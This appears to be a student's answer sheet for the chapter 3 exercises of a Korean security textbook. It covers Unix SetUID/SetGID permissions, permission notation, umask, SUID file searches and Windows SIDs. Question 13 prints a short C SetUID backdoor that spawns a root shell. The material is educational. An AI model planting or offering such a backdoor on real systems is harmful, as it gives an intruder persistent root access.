한빛미디어 - 정보 보안 개론과 실습 제 3장 연습문제

1. 다음중 SetUID와 SetGID로 권한을 설정할 수 없는 운영체제는?

① 솔라리스

② 레드헷

③ 윈도우 2000 (정답)

④ 한컴 리눅스

2. 다음 중 실질적으로 root 계정의 권한과 같은 상태에 있는 계정을 모두 고르시오.

① ID:root, UID:0, GID:0, EUID:100, EGID:100

② ID:root, UID:50, GID:0, EUID:100, EGID:50

③ ID:root, UID:50, GID:0, EUID:0, EGID:50 (정답)

④ ID:wishfree, UID:50, GID:50, EUID:0, EGID:50 (정답)

3. 다음 중 파일에 대한 접근 권한을 표기한 것은? 1번

lrwxrwxrwx 1 root root 11 11월 8 13:11 init.d -> rc.d/init.d ① ② ③ ④ ⑤ ⑥ ⑦ ⑧ ⑨

4. 문제 3번 보기에서 init.d 파일을 소유한 계정과 이 계정이 속한 그룹은?

3번(root), 4번(root)

5. 다음 중 접근 권한을 숫자로 적절히 표기한 것은 고르시오.

① lrwxrwxrwx → 700

② drwxr-xr-x → 755 (정답)

③ rws--x--x → 4611

④ r-------- → 400 (정답)

⑤ r-s--x--x → 4511 (정답)

⑥ r-xr-xr-- → 665

6. 파일의 권한을 바꾸는 명령어는?

chmod

7. 파일의 소유자가 관리하면서, SetUID 비트를 가진 파일을 검색하는 명령은?

① find / -name root -perm +4000

② find / -name root -perm +2000

③ find / -user root -perm +4000 (정답)

④ find / -user root -perm +2000

8. 접근 권한의 첫 번째 문자(파일속성)에서 잘못된 것은?

① d → Dirctory File

② - → Regular File

③ I → Symbolic Link

④ p → Page file (정답) - Pipe file

9. 다음의 윈도우 계정 중 맨 상위 권한의 계정은?

① wishfree

② Administrator

③ SYSTEM (정답)

④ Guest

10. 다음중 SID 구조에 대한 설명 중 틀린 것은?

The SID for account NEWGENERATION\administrator is S-1-5-21-1801674531-839522115-1708537768-500 ① ② ③ ④

① 해당 시스템이 윈도우 시스템이다.

② 시스템이 도메인 컨트롤러이거나 단독 시스템(Stand alone system)이다.

③ 시스템의 고유한 숫자이다. 시스템을 설치할 때 시스템의 특성을 수집하여 생성한다.

④ 숫자로 표현된 시스템에 존재하는 그룹별 고유한 ID다. 관리자 그룹은 500번 일반 사용자 그룹은 1000번 이상이다. (정답) - 그룹 아니고 각 사용자의 고유 ID

심화 문제

11. umask에 대해 설명하시오.

Umask란 새로 만들어지는 디렉토리와 파일에 대한 퍼미션에 적용된 마스크를 지정해주는 지시자이다.

12. SetUID와 SetGID의 동작 원리를 설명하시오.

비밀번호를 변경할 때(passwd) 일시적으로 관리자와 같은 권한을 갖게 된다. 하지만 passwd 명령어가 끝나는 순간 다시 원래되로 돌아오는데 이게 SetUID 역할이다. SetGID도 SetUID와 많이 다르지 않다. - 147p 그림 참조-

13. SetUID를 이용한 백도어를 설명하시오.

#include<stdio.h>

main(){

setuid(0);

setgid(0);

system("/bin/sh");

}

소스코드를 보면 알 수 있듯이 uid와 gid를 바꾸게 하는 프로그램이 백도어이다. 백도어를 실행하여 root(쉘) 권한을 획득할수 있다. 

정보 보안 개론과 실습 제 3장 연습문제.hwp